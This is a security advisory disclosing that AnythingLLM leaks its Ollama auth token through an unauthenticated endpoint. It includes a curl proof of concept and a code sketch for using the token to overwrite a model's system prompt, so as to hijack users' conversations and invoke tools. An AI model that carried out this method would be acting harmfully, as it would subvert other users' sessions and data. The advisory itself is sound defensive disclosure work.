Coordinated Disclosure Timeline

Summary

If AnythingLLM is configured to use Ollama with an authentication token, this token could be exposed in plain text to unauthenticated users at the /api/setup-complete endpoint.

Project

AnythingLLM

Tested Version

v1.7.8

Details

Ollama token leak in systemSettings.js (GHSL-2025-056)

AnythingLLM exposes an endpoint, /api/setup-complete, that requires no credentials, even when the AnythingLLM instance itself is protected with authentication. The endpoint reveals some system information about the instance but masks most sensitive values. However, if AnythingLLM is configured to use Ollama with an authentication token, that token is not masked, due to an error on line 475 of systemSettings.js.
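The pattern behind the bug can be sketched as follows. This is an illustrative reconstruction, not the actual AnythingLLM source: the hypothetical maskValue() helper and the environment-variable names are assumptions, but they mirror the reported behavior where most secrets are masked while the Ollama token is returned verbatim.

```javascript
// Illustrative sketch of the vulnerable pattern (not the real code).
function maskValue(value) {
  // Keep a short prefix so an admin can still identify the key.
  return value ? value.slice(0, 4) + "*".repeat(8) : null;
}

function currentSettings(env) {
  return {
    OpenAiKey: maskValue(env.OPEN_AI_KEY),             // masked correctly
    AnthropicApiKey: maskValue(env.ANTHROPIC_API_KEY), // masked correctly
    OllamaLLMAuthToken: env.OLLAMA_AUTH_TOKEN,         // BUG: plain text
  };
}
```

Because the unmasked field is serialized into the /api/setup-complete response, any unauthenticated client receives the raw token.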

Proof of concept

curl localhost:3001/api/setup-complete | grep OllamaLLMAuthToken

Vulnerable code location

https://github.com/Mintplex-Labs/anything-llm/blob/051ed15f1f6b9f7f44f4663bf752a7ec3ee66f2c/server/models/systemSettings.js#L475

Impact

Leaking the Ollama token grants an attacker complete access to the Ollama instance. Since Ollama offers an API for configuring models, an attacker could modify a model's template or system prompt to change its behavior. This would enable attackers to hijack other users' conversations, invoke any tools or MCP servers used by AnythingLLM, and potentially access documents uploaded to AnythingLLM by other users.
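As a sketch of the attack, the leaked token could be used to craft a request to Ollama's model-creation API that overwrites the system prompt of the model AnythingLLM relies on. The endpoint and payload shape follow Ollama's documented /api/create route; the host, model name, and prompt below are assumptions for illustration.

```javascript
// Hedged sketch: build (not send) a request that would rebuild a model
// with an attacker-controlled system prompt, authenticated with the
// leaked OllamaLLMAuthToken.
function buildHijackRequest(token, model, maliciousSystemPrompt) {
  return {
    url: "http://ollama-host:11434/api/create", // hypothetical host
    options: {
      method: "POST",
      headers: {
        Authorization: `Bearer ${token}`, // leaked token
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        model,                         // model name AnythingLLM uses
        from: model,                   // rebuild from the same base model
        system: maliciousSystemPrompt, // attacker-controlled behavior
      }),
    },
  };
}
```

Every subsequent chat routed through the rebuilt model would then follow the attacker's instructions, which is what enables the conversation-hijacking and tool-invocation scenarios described above.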

CWE

Credit

This issue was discovered and reported by GHSL team member @artsploit (Michael Stepankin).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2025-056 in any communication regarding this issue.

https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-7hpg-6pc7-cx86